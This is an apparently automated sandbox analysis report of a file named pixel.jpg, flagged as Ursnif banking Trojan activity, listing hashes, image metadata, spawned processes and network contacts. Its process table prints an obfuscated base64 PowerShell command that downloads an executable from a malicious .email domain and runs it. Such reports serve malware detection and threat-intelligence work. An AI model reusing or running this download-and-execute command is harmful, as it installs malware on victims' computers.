Field | Value |
---|---|
File name | pixel.jpg |
Full analysis | https://app.any.run/tasks/5a530de8-22f2-449a-8839-082c3eb31d5a |
Verdict | Malicious activity |
Threats | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date | March 21, 2019, 10:54:41 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | image/jpeg |
File info | JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 232x309, frames 3 |
MD5 | 682CD610E4135E8A3203E9994076961D |
SHA1 | C3016D7F6547536B5B11EBB15FBBBC46EECD39B9 |
SHA256 | 4A1832614F81E61521B7BC845766678B9411C6D09460EDB8310ABBB03A6D5EE2 |
SSDEEP | 384:2KcrBurfMKAU2HipomnJb93HP63nr/Fdos5E6B6Non4xpq3jYC+AxwEX9VcBgC6i:25BuIRU2CpomnJZvWnbF636BSonm+xwN |
Extension | Type |
---|---|
.jpg | JFIF-EXIF JPEG Bitmap (38.4) |
.jpg | JFIF JPEG bitmap (30.7) |
.jpg | JPEG bitmap (23) |
.mp3 | MP3 audio (7.6) |
Field | Value |
---|---|
JFIFVersion | 1.01 |
ResolutionUnit | None |
XResolution | 72 |
YResolution | 72 |

Field | Value |
---|---|
Orientation | Horizontal (normal) |
XResolution | 72 |
YResolution | 72 |
ResolutionUnit | inches |
ColorSpace | sRGB |
ExifImageWidth | 232 |
ExifImageHeight | 309 |

Field | Value |
---|---|
IPTCDigest | d41d8cd98f00b204e9800998ecf8427e |

Field | Value |
---|---|
ImageSize | 232x309 |
Megapixels | 0.072 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
1756 | "C:\Windows\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Desktop\pixel.jpg | C:\Windows\System32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2724 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
4080 | powershell -e JABHAHcAUQBEAG8AWAA9ACgAJwBEAEEAXwB4AHcAQQAnACsAJwBEACcAKwAnAHcAJwApADsAJABNAEEAQwBBAFUAQgBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABhAEEAQQBjAEMAQQB3AD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AbQBrACcAKwAnAGEAdABhAHIAaQBuAGEANwAwACcAKwAnADkAJwArACcANABtAGEAeQBiAGUAbAAnACsAJwBsAGUAJwArACcALgBlACcAKwAnAG0AYQAnACsAJwBpAGwAJwArACcALwBsAG8AcQA5ACcAKwAnADEALwAxADAAeAAnACsAJwAuAHAAaABwACcAKwAnAD8AbAAnACsAJwA9AHAAbwBmACcAKwAnAGUAeAA1AC4AJwArACcAagBhACcAKwAnAGQAJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAHAAQQBBAFUAQQBDAEEAQQA9ACgAJwBqAFEAWgBCACcAKwAnAEcAJwArACcAawBEACcAKQA7ACQATgBHAFoAWABjAHgAVQAgAD0AIAAoACcAMgAnACsAJwA1ADcAJwApADsAJAB3AFEAUQBaAHcAWABBAD0AKAAnAG8AJwArACcAVQBDAGMAMQBBACcAKQA7ACQAYwBBAFUAXwBBADEAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBHAFoAWABjAHgAVQArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEMAQgBRAFoAQQBBAFUAWgAgAGkAbgAgACQAYQBBAEEAYwBDAEEAdwApAHsAdAByAHkAewAkAE0AQQBDAEEAVQBCAG8ALgAoACcARABvAHcAbgBsACcAKwAnAG8AYQAnACsAJwBkACcAKwAnAEYAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAEMAQgBRAFoAQQBBAFUAWgAsACAAJABjAEEAVQBfAEEAMQBBACkAOwAkAFYAQQBCAEEAQgBrAD0AKAAnAGIAdwAnACsAJwBBAEQAawAnACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABjAEEAVQBfAEEAMQBBACkALgAiAEwAYABlAGAATgBHAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBBAFUAXwBBADEAQQA7ACQAYQBRAEEAQgBHAFoAbwA9ACgAJwBPAEEAQQBBACcAKwAnAFEAJwArACcAWAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAegBDAEQAeABBAEQAQQBBAD0AKAAnAHoAJwArACcAQQBBACcAKwAnAEEAQQBCAEIAWgAnACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XYF8576LIP4H9YRZNKXA.temp | — | — | — |
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfd0c4.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4080 | powershell.exe | GET | 404 | 89.223.28.79:80 | http://mkatarina7094maybelle.email/loq91/10x.php?l=pofex5.jad | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4080 | powershell.exe | 89.223.28.79:80 | mkatarina7094maybelle.email | Trader soft LLC | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
mkatarina7094maybelle.email | | malicious |